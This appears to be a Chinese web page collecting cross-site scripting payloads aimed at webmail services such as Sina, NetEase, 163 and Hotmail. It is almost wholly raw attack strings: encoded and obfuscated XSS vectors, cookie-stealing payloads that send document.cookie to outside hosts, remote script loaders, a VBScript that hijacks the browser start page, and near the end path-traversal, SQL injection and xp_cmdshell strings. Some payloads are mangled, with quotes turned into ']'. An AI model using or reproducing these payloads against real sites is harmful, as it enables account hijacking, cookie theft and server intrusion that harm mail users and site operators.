好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

邮箱跨站代码收集 - 网站安全 - 自学php

<script>alert("dddd")<script>

 

<script>alert('test')</script>

 

----------------------------TOM-------------------------------------------------------------------

<iframe/**/src=http://HdhCmsTestbaidu测试数据>57</iframe>

<style onreadystatechange=alert(60)>60</style>

 

----------------------------------------------------------------------------------------------

 

<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\002F\0078\0073\0073\002F\0029\0029">

 

<frameset onload=alert(1)>

 

 

<IMG SRC="jav ascript:alert('XSS-1');">

 

 

<IMG """><SCRIPT>alert("XSS-2")</SCRIPT>">

 

 

Hello,80sec  </xss style="x:expression(alert(document.cookie))">

 

 

<IMG

SRC

=

"

j

a

v

a

s

c

r

i

p

t

:

a

l

e

r

t

(

'

X

S

S

'

)

"

>

 

 

 

<img src=http://up.2cto测试数据/2012/1218/20121218013340989.gif onLoad=alert(/xss-3/);>

 

 

 

<img src="javascrip&#116&#58alert(/xss-4/)" width=100>

 

 

<img src="#" style="Xss:expression(alert(/xss-5/));">

 

 

<style>

input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))

</style>  

<input type="text">

 

 

<style>

a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))

</style>

<a></a>

 

 

<marquee style="background-color:red" onstart="alert('monyer')" >asdf</marquee>

 

 

 

<div>\n<marquee style=\"BACKGROUND-COLOR:red;\" onstart="alert('monyer')"\n>asdf<\/marquee><\/div>

 

 

<img src=<marquee style="background-color:red" onstart="alert('monyer')"  onerror=alert(/XSS-6/)>></marquee>

 

<img src=<marquee style="background-color:red" onstart="alert('monyer')"  onerror=onerror=alert(/XSS-7/)>><marquee>

 

<img src=<marquee style="background-color:red" onstart="alert(/"/")  onerror=onerror=alert(/XSS-8/)>><marquee> 

这个新浪只差一个"闭合了

 

 

 

 

<img src="<marquee style="background-color:red" onstart="alert("(")  onerror=onerror=alert(/XSS-9/)>><marquee>

 

 

 

 

<img src=" http://xss.jpg"[‘; onerror=alert('onerror=')>

这个新浪不让加入

 

 

<img src=" http://xss.jpg" onerror=alert('onerror=')>

 

 

 

<img src=" http://xss.jpg" style=\"BACKGROUND-COLOR:red;\" onerror=alert('onerror=')>

 

 

 

<DIV style="xss:ex/*ss*/pression(alert('http://hi.baidu测试数据/ycosxhack'))"></DIV>

 

 

 

<img src=" http://xss.jpg" onerror=alert('XSS-10')>

 

 

 

<IMG onerror="alert('XSS-11')" src=" http://xss.jpg">

 

 

 

<img src=http onerror=alert(/XSS-12/)>

 

 

 

 

<div style="background-color:red" onmouseenter="alert('monyer')">123456</div>

 

 

 

 

 

<HTML><HEAD>

</HEAD>

<BODY>

<P>参加</P>

<div id="nini" style="display:none">window.xx=2;var f=document.createElement('script');f.src='http://HdhCmsTestmail-query测试数据/test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)</div><style><!--a{font-size:14px;font-family:arial,verdana,sans-serif;</style><div>;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);</div><style>}--></style><a></a><img width="1" height="1" src="http://HdhCmsTestmail-query测试数据/test.js">

</BODY></HTML>

 

网易最新的xss

 

 

 

 

 

 

<script defer="defer">var a,b,c,d,e;a="http:";b="//";c="www";d=".baidu";e="测试数据";window.open(a+b+c+d+e,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");</script>

 

 

---------

 

 

<div id="aaa" style="display:none"></div>

<div id="llyy" style="display:none">

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

<HTML XMLNS:t="urn:schemas-microsoft-com:time">

<div>1<t:animate style="behavior:url(#default#time2)" attributename=innerhtml values=&lt;img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)&gt;></div>

 

 

 

---------

 

 

 

 

<div id="aaa" style="display:none"></div>

<div id="llyy" style="display:none">

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

<HTML XMLNS:t="urn:schemas-microsoft-com:time">

<div>1<t:animate style="behavior:url(#default#time2)" /*t*/attributename=innerhtml values=&lt;img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&gt;></div>

 

---------

 

<div id="aaa" style="display:none"></div>

<div id="llyy" style="display:none">

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

<HTML /*t*/XMLNS:t="urn:schemas-microsoft-com:time">

<div>1<t:animate style="/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)" /*t*/attributename=innerhtml values=&lt;img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&gt;></div>

 

---------

<div id="aaa" style="display:none"></div>

<div id="llyy" style="display:none">

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

<HTML /*t*/XMLNS:t/*t*/=/*t*/"urn:schemas-microsoft-com:time"/*t*/>

<div>1<t:animate style="/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)" /*t*/attributename=innerhtml values=&lt;img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&gt;></div>

 

---------

 

<div id="aaa" style="display:none"></div>

<div id="llyy" style="display:none">

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

<HTML /*t*///fuckyou///\/XMLNS:t/*t*/=/*t*/"urn:schemas-microsoft-com:time"/*t*/>

<div>1<t:animate style="/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)" /*t*/attributename=innerhtml values=&lt;img/src=`onerror.eval\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\////////////////////*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&gt;></div>

 

---------

<div style=width:1px;filter:glow onfilterchange=alert(1)>x

 

 

 

<!--<img src="--><img src=x onerror=alert(1)//">

 

 

 

<comment><img src="</comment><img src=x onerror=alert(1)//">

 

 

 

<style><img src="</style><img src=x onerror=alert(1)//">

 

 

 

<x '="foo"><x foo='><img src=x onerror=alert(1)//'>

 

 

---------

 

<a href="javascript#[code]">

<div >

<img src="javascript:[code]">

<img tdynsrc="javascript;[code]"> [IE 浏览器 ]

<input type="imge" dynsrc="javascript;[code]"> [IE浏览器]

<bagsound src="javascript;[code]"> [IE浏览器]

&<script>[code]</script>

&{[code]} [N4浏览器]

<img src=&{[code]};>

<link rel="stylesheet" herf="javascript;[code]">

<iframe src="vbscript:[code]"> [IE浏览器]

<img src="mocha:[code]"> [N4浏览器]

<img src="livescript:[code]"> [N4浏览器]

<div style="behaviour:url([link to code])"> [IE浏览器]

<div style="binding:url([link to code])"> [Mozilla浏览器]

<div style="width:expression([code]);"> [IE浏览器]

<object classid="clsid:..." codebase="javascript:[code]"> [IE浏览器]

[\xCO][\xBC]script>[code][\xCO][\xBC]/script> [UTF-8;IE;Opera浏览器]

   <a href="javascript#[code]">

   <div onmouseover="[code]">

   <img src="javascript:[code]">

   <img dynsrc="javascript:[code]"> [IE]

   <input type="image" dynsrc="javascript:[code]"> [IE]

   <bgsound src="javascript:[code]"> [IE]

   &<script>[code]</script>

   &{[code]}; [N4]

   <img src=&{[code]};> [N4]

   <link rel="stylesheet" href="javascript:[code]">

   <iframe src="vbscript:[code]"> [IE]

   <img src="mocha:[code]"> [N4]

   <img src="livescript:[code]"> [N4]

   <a href="about:<script>[code]</script>">

   <meta http-equiv="refresh" content="0;url=javascript:[code]">

   <body onload="[code]">

   <div style="background-image: url(javascript:[code]);">

   <div style="behaviour: url([link to code]);"> [IE]

   <div style="binding: url([link to code]);"> [Mozilla]

   <div style="width: expression([code]);"> [IE]

   <style type="text/javascript">[code]</style> [N4]

   <object classid="clsid:..." codebase="javascript:[code]"> [IE]

   <style><!--</style><script>[code]//--></script>

   <![CDATA[<!--]]><script>[code]//--></script>

   <!-- -- --><script>[code]</script><!-- -- -->

   <script>[code]</script>

   <img src="blah"onmouseover="[code]">

   <img src="blah>" onmouseover="[code]">

   <xml src="javascript:[code]">

   <xml id="X"><a><b><script>[code]</script>;</b></a></xml>

   <div datafld="b" dataformatas="html" datasrc="#X"></div>

   [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

 

 

 

 

<IFRAME SRC="http://HdhCmsTestbaidu测试数据/"></IFRAME>

<script>alert('dddd')<script>

 

 

&nbsp;

&lt;

&#39;

 

 

 

<style>*{x:expression(if(x!=1){alert(1);x=1;})}</style>

<img lowsrc= "javascript:alert('xss-13')">

 

<script>

</script>

 

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-14")';</STYLE>

<img src="#" style="Xss:expression(alert('xss-15'));"> 

<img src="javascript:alert(/xss-16/)"> 

<table background="javascript:alert(/xss-17/)"></table>

<img src="vbscript:msgbox(&quot;a&quot;)">

 

 

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x77&#x77&#x77&#x2E&#x68&#x61&#x63&#x6B&#x6D&#x2E&#x63&#x6F&#x6D&#x27&#x29>

 

<img src=j&#x09;ava&#x09;script:wi&#x09;ndow.op&#x09;en('http://HdhCmsTesthackm测试数据')>

<img src=javascript:document.write('<Iframe%20src=http://hi.baidu测试数据/jc123%20width=500%20height=550%3E</iframe%3E')> 

<img src=javascript:document.write('%3CIframe%20src=http://hi.baidu测试数据/jc123%20width=500%20height=550%3E%3C/iframe%3E')>

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x64ocument&#x2ewrite&#x28&#x27&#x3cIframe%20src=http://hi.baidu测试数据/jc123%20width=500%20height=550%3E&#x3c/iframe%3E')>

<script>window.location=('http://HdhCmsTestbaidu测试数据/')</script>

<img src="/BLOG/javascript:document.write"('<Iframe%20src=http://HdhCmsTestbaidu测试数据%20width=500%20height=550%3E</iframe%3E')>

<img src=j avascript:document.write('%3CIframe%20src=http://HdhCmsTestbaidu测试数据%20width=500%20height=550%3E%3C/iframe%3E')>

<img src="/BLOG/&";#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69& #x70&#x74&#x3A&#x64ocument&#x2ewrite&#x28&#x27& #x3cIframe%20src=http://HdhCmsTestbaidu测试数据%20width=500%20height=550%3E&#x3c/iframe% 3E')>

 

<body onload='window.open("http://HdhCmsTestbaidu测试数据")'>

 

<body onload='&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#111;&#112;&#101;&#110;("&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#98;&#97;&#105;&#100;&#117;&#46;&#99;&#111;&#109;")'>

 

<meta http-equiv="refresh" content="0;url=http://HdhCmsTestbaidu测试数据">

 

<img dynsrc=javascript:alert("hi,163")>

 

<img dynsrc=javascript:window.location.href='http://yourwebsite测试数据/getcookie.asp?msg='+document.cookie>。

 

<marquee onstart="alert(/xss-18/)">.</marquee>

 

前段时间被过滤的hotmail跨站代码

<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://xxx测试数据/test/index.asp?uid=someone@hotmail测试数据'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>

 

<font color="ffffff">

<div id="jmp" style="display:none">nop</div>

<div id="ly" style="display:none">

function ok()

{

return true

};

window.onerror=ok</div>

<div id="tip" title="<a style="display:none">" style="display:none"></div>

<div id="tap" title="<" style="display:none"></div>

<div id="tep" title=">" style="display:none"></div>

<style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://xxx测试数据/test/index.asp?uid=someone@hotmail测试数据'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style>

</font>

 

 

 

 

 

<STYLE type=text/css>BODY {

}

TD {

FONT-SIZE: 12px; COLOR: #ffdfad; LINE-HEIGHT: 20px

}

A {

FONT-SIZE: 12px; COLOR: #000000; TEXT-DECORATION: none

}

A:hover {

FONT-SIZE: 12px; COLOR: #ffff00; TEXT-DECORATION: underline

}

</STYLE>

 

 

 

 

<style>BR{top:rgb('88',80,'180);top:rgb(') !important height:exPrEsSiOn((window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123))}',80,'180);}</style>

 

 

 

 

 

<div id="xxx" style="DISPLAY: none" title="try{window['on'+'error']=function(){return true;};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}">.</div><div style="DISPLAY: none"><img lang="HTML" id="inner" title="<img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#>" width=0 src="http://#" style="background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.title;//)`"></div> 

 

 

 

 

<IMG SRC=]javascript:alert(‘XSS-20’);]>

<IMG SRC=javascript:alert(‘XSS-21’)>

<IMG SRC=]javascript:alert(String.fromCharCode(88,83,83))]>

<IMG SRC=]jav ascript:alert(‘XSS-22’);]>

<SCRIPT/XSS SRC=]http://example测试数据/xss.js]></SCRIPT>

<<SCRIPT>alert([XSS-23]);//<</SCRIPT>

<iframe src=http://example测试数据/scriptlet.html <

<INPUT TYPE=]IMAGE] SRC=]javascript:alert(‘XSS-24’);]>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS-24');">

<BODY BACKGROUND=]javascript:alert(‘XSS-25’)]>

<BODY ONLOAD=alert(document.cookie)>

<BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert([XSS-26])>

<IMG DYNSRC=]javascript:alert(‘XSS-27’)]>

<IMG DYNSRC=]javascript:alert(‘XSS-28’)]>

<BR SIZE=]&{alert(‘XSS-29’)}]>

<IMG SRC=’vbscript:msgbox([XSS-30])’>

<TABLE BACKGROUND=]javascript:alert(‘XSS-31’)]>

<DIV STYLE=]width: expression(alert(‘XSS-32’));]>

<DIV STYLE=]background-image: url(javascript:alert(‘XSS-33’))]>

<STYLE TYPE=]text/javascript]>alert(‘XSS-34’);</STYLE>

<STYLE type=]text/css]>BODY{background:url([javascript:alert(‘XSS-35’)])}</STYLE>

<?=’<SCRIPT>alert([XSS-36])</SCRIPT>’?>

<A HREF=]javascript:document.location=’http://HdhCmsTestexample测试数据/’]>XSS</A>

<IMG SRC=javascript:alert(‘XSS-37’)>

<EMBED SRC=]http://ha.ckers.org/xss.swf] AllowScriptAccess=]always]></EMBED>

a=]get];

b=]URL([]";

c=]javascript:];

d=]alert(‘XSS-38’);]")];

eval(a+b+c+d);

 

 

<img src="url.gif" dynsrc="url.avi">

<bgsound src="sound.wav" loop=3>

<img src="SAMPLE-S.GIF" dynsrc="SAMPLE-S.AVI" start=mouseover>

<script>window.location="http://HdhCmsTestmimige.cn"</script> 

<script language=JavaScript>alert("终于有人上当的了!")</script>

 

 

<TABLE background=javscript:alert(/xss-39/)>

 

 

<iframe src=javascript:alert(/xss-40/)>

 

<a href=javascript:alert(/xss-41/)>

 

 

<DIV STYLE="background-image: url(javascript:alert('XSS-42'))">

 

 

 

<DIV STYLE="width: expression(alert('XSS-43'));">

<DIV STYLE="width: exp/*xss*/ression(alert('XSS-44'));">

 

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-45")';</STYLE>

 

 

<script>open(/*

*/"http://127"/*

*/+".0.0.1/"/*

*/)</script>

 

 

<script>/*

*/eval(/*

*/String/*

*/./*

*/fromCharCode/*

*/(100,/*

*/111,99,/*

*/.....*

*/59))/*

*/</script>

 

 

<script language="VBScript">

Set RegWsh = CreateObject("WScript.Shell")

RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://HdhCmsTestattacker测试数据" 

</script>

 

 

 

<a href="javascript:alert('xss-46');">Click here</a>

 

 

 

<form method="post" action="javascript:alert('xss-47');">

<input type="submit" value="Submit">

</form>

 

 

 

 

<img src="javascript:alert('xss-48');"><!--只有ie能成功-->

 

 

 

<object type="text/x-scriptlet" data="http://HdhCmsTestbaidu测试数据"></object> 

 

 

 

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x77&#x77&#x77&#x2E&#x68&#x61&#x63&#x6B&#x6D&#x2E&#x63&#x6F&#x6D&#x27&#x29>

 

 

 

<style type="text/css">

@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));

</style>

 

 

 

 

<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="&lt;a style=&quot;display:none&quot;&gt;" style="display:none"></div><div id="tap" title="&lt;" style="display:none"></div><div id="tep" title="&gt;" style="display:none"></div><style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://xxx测试数据/test/index.asp?uid=someone@hotmail测试数据'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>

 

 

 

 

<img src=javascript:document.write('%3CIframe%20src=HdhCmsTestbaidu测试数据%20width=500%20height=550%3E%3C/iframe%3E')>

 

 

<STYLE>

Xsstc { background-image: url('about:blank#Hello%20World'); } 

</STYLE>

Xsstc.exec('http://lbs.tralfamadore测试数据/test.css', showResponse)

 

 

<font color="ffffff"> 

     <div id="jmp" style="display:none">nop</div>

     <div id="ly" style="display:none">      //这几个DIV是用来分段存储exp内容的

         function ok(){return true};

         window.onerror=ok

     </div>

     <div id="tip" title="&lt;a style=&quot;display:none&quot;&gt;" style="display:none"></div>

     <div id="tap" title="&lt;" style="display:none"></div>

     <div id="tep" title="&gt;" style="display:none"></div>

     <style>

 //以下是EXP的开始,一个二元表达式内嵌利用代码。代码把div中存储的内容取出来然后加一起,形成了最终shellcode。

         div{background-image:expression(

             javascript:1?document.write(

                     EC_tip.title+';top:'+EC_tap.title+'/a'+

                     EC_tep.title+EC_tap.title+'script id=nop'+

                     EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+

                     EC_tep.title+EC_tap.title+

                     'script src=http://localhost/1.js'+

                     EC_tep.title+EC_tap.title+'/script'+

                     EC_tep.title)

                     :1=1);

                 }

         </style>

 </font>

 

 

 

<img src="java script:alert(/xss-49/)" width=0> 

 

 

<img src="#" onerror=alert(/xss-50/) width=0> 

 

<a href="replace.htm#state=0&url=http://HdhCmsTest39516测试数据/<script>alert('xeye')</script>">xeye</a>

 

 

 

<link type="text/css" rel="stylesheet" href=" http://HdhCmsTestbaidu测试数据" />

 

<body{background: url(javascript:alert(document.cookie); ) }</body>

 

 

 

<script/hello>alert(/xss-51/)</script/world>

 

 

<img/ssssss/src="javascript:alert(/1/)">

<IMG SRC=`javascript:alert(/2/)`>

 

<IMG/src/SRC=`SRC//=//javascript:alert(/2/)`>

<IMG/src=javascript:alert(/2/)`/SRC=`;SRC=javascript:alert(/2/)>

 

<style>body{xss:expression(alert(/xss-52/))}</style>

 

 

<style>@import 'javascript:alert(/xss-53/)'; </style>

 

 

<script>alert("XSS-54")</script>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-55")';</STYLE>

<style>@\im\port'\ja\vasc\ript:alert()';</style>

<style>@\im\po\rt'\0ja\0va\0sc\0ri\0pt:alert()';</style>

<STYLE>@\0im\port'\0ja\vasc\ript:alert("XSS-56")';</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS-57')")}</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS-58')");}</STYLE><A CLASS=XSS></A> 

<marquee onstart="alert(/2/)">.</marquee>

<div style="xss:ex/**/pre/**/ssion(alert('xss-59'))">

<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))">

<DIV STYLE="width: expression(alert('XSS-60'));">

<div style="background:url('javascript:alert(1)')"> 

<DIV STYLE="background-image: url(javascript:alert('XSS-61'))">

<div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')">

<div id="mycode" expr="alert('hah!')" style="background:url('java\script:eval(document.all.mycode.expr)')"> 

<BODY BACKGROUND="javascript:alert('XSS-62')">

<BODY ONLOAD=alert('XSS-63')>

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS-64');">

<FRAMESET><FRAME src=javascript:alert('XSS-65')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS-66')">

<iframe src="vbscript:alert()">

<IFRAME src=javascript:alert('XSS-67')></IFRAME>

<IMG STYLE='xss:expre\ssion(alert("XSS-68"))'>

<img src="#" style="Xss:expression(alert('xss-69'));">

<IMG src='vbscript:msgbox("XSS-70")'>

<IMG DYNsrc="javascript:alert('XSS-71')"> 

<IMG LOWsrc="javascript:alert('XSS-72')">

<img src="javascript:alert('3');">

<img src=http://up.2cto测试数据/2012/1218/20121218013340892.jpg" onerror=alert('4')>

<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">

<IMG src=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<img src="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&#x3b"> =<img src="javascript:alert('5');">

<img STYLE="background-image: url(javascript:alert('6'))">

javascript:document.write("<script src=http://HdhCmsTestpc010.cn/1.js></script>") 

<img src="javascript:alert(/10/)">

<img src="#" onerror=alert(/11/) >

<IMG SRC="JAVA&115;CRIPT:ALERT('12');"></IMG>

<img src="javas&#99;ript:alert('XSS-73')">

<IMG src="jav&#x09;ascript:alert('XSS-74');"> 

<IMG src="jav&#x0A;ascript:alert('XSS-75');"> 

<IMG src="jav&#x0D;ascript:alert('XSS-76');"> 

javascript:document.write('<scri'+'pt src=http://HdhCmsTesthackwolf.cn/1.txt>'+'</scri'+'pt>');

RSnake的经典XSS脚本都测试下

AJAX技术

[float=expression(alert('xss-77'))]11[/float]

<TABLE BACKGROUND=javscript:alert(/xss-78/)>

 

163的跨站 <img src="jav as cript:alert('XSS-79');">

126 <img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">

 

<img src="javascript:window.open('http://wg12.cn/msg.asp?msg=&#39;+document cookie);">

 

xss.jpg" onerror=window.open('http://wg12.cn/msg.asp?msg=&#39;+&#39;document cookie) width=0>

<img src="blah"onmouseover=alert()>

 

<img onmouseover=alert()></img>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-80")';</STYLE> 

 

<img src="abc>" onmouseover="[code]">

<SCRIPT a=">" SRC="xss.js"></SCRIPT>

 

<script>/*

*/alert/*

*/("zs")/*

*/</script>

 

<table><tr><td background="javascript:alert(/xss-81/)"></tr></table>

 

 

<img onmouseover=alert()></img>

<STYLE>@im\port'\ja\vasc\ript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))';</STYLE> 

 

<style>@import url(http://xxx.xxx.xxx/xss.css); </style>

xss.css

body{

xss:expression(

if(!window.x)//防止重复执行

{alert('xss-82');

window.x=1;

}

)

}

 

 

 

<style   type= "text/css "   media= "all "   title= "Default "> 

.mycss   { 

color:red; 

wuxinlangman:expression(onmousemove=function(){ 

this.style.color= "blue "; 

},onmouseout=function(){ 

this.style.color= "red "; 

}) 

    </style> 

    <body   id= "wuxinlangman "> 

<input   class= "mycss "   value= "wuxinlangman "/> 

 

 

 

 

 

 

 

 

 

<style type="text/css">

a {star : expression_r(onfocus=this.blur)}

</style>

<a href="link1.htm">link1</a>

<a href="link2.htm">link2</a>

<a href="link3.htm">link3</a>

 

 

 

<style>body{xss:expr/*/*/expression/expression*/ession(alert(/xss-83/))}</style>

<STYLE>body{xss:exprexpression/expression*/ession(alert(/xss-84/))}</STYLE>

 

<style>body{xss:expr/*/*//*/ession(alert(/xss-85/))}</style>

<STYLE>body{xss:expr/*/ession(alert(/xss-86/))}</STYLE>

 

<style>body{xss:expr/*/*/ession(alert(/xss-87/))}</style>

<STYLE>body{xss:exp_ression(alert(/xss-88/))}</STYLE>

 

<style>body{xss:expr/*//*/ession(alert(/xss-89/))}</style>

<STYLE>body{xss:exp_ression(alert(/xss-90/))}</STYLE>

 

<style>body{xss:expr/*///*////*/ession(alert(/xss-91/))}</style>

<STYLE>body{xss:expr///*/ession(alert(/xss-92/))}</STYLE>

 

<style>body{xss:expr/*///**////*/ession(alert(/xss-93/))}</style>

<STYLE>body{xss:expr///*/ession(alert(/xss-94/))}</STYLE>

 

<style>body{xss:expr/*///******////*/ession(alert(/xss-95/))}</style>

 

 

 

 

 

---------

 

 

 

'><script>alert(document.cookie)</script> 

='><script>alert(document.cookie)</script> 

<script>alert(document.cookie)</script> 

<script>alert(vulnerable)</script> 

%3Cscript%3Ealert('XSS-96')%3C/script%3E 

<s&#99;ript>alert('XSS-97')</script> 

<img src="javas&#99;ript:alert('XSS-98')"> 

%0a%0a<script>alert(\"Vulnerable\")</script>. jsp  

%22%3cscript%3ealert(%22xss%22)%3c/script%3e 

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 

%3f.jsp 

%3f.jsp 

&lt;script&gt;alert('Vulnerable');&lt;/script&gt 

<script>alert('Vulnerable')</script> 

?sql_debug=1 

a%5c. asp x 

a.jsp/<script>alert('Vulnerable')</script> 

a/ 

a?<script>alert('Vulnerable')</script> 

"><script>alert('Vulnerable')</script> 

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& 

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 

%3Cscript%3Ealert(document. domain);%3C/script%3E& 

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 

etc/passwd 

..\..\..\..\..\..\..\..\windows\system.ini 

\..\..\..\..\..\..\..\..\windows\system.ini 

'';!--"<XSS>=&{()} 

<IMG SRC="javascript:alert('XSS-99');"> 

<IMG SRC=javascript:alert('XSS-100')> 

<IMG SRC=JaVaScRiPt:alert('XSS-101')> 

<IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)> 

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41> 

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 

<IMG SRC="jav&#x09;ascript:alert('XSS-102');"> 

<IMG SRC="jav&#x0A;ascript:alert('XSS-103');"> 

<IMG SRC="jav&#x0D;ascript:alert('XSS');"> 

